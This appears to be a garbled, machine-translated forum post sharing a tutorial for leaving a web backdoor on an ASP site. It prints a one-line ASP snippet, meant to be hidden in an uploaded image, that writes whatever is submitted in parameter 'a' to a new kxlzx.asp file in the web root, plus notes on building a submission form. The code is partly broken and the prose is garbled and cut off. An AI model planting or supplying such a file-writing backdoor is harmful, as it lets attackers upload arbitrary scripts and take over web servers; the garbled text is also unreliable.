Leave the webpage back door again ~~ About smelling! I have no test success, I am more dull ~~ But I find that he is a good way!
Here is the original text in his tutorial: ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------- My inserted picture:
<% IF Request ("a") <> "" "Scripting.FileSystemObject" fdata = request ("a") set objcountfile = objfso.createtextfile (Server.MAppath ("/ kxlzx.asp "), True) ObjcountFile.write fdataend IF%>
This code is mainly to generate a kxlzx.asp file under the root directory. (I changed) The file content is data we submitted. Used with Request ("a").
This code is inserted into the picture.
Local yourself build a submission form One-way ASP file submission (joining the image file) Form text box Enter the content name is: A Form code: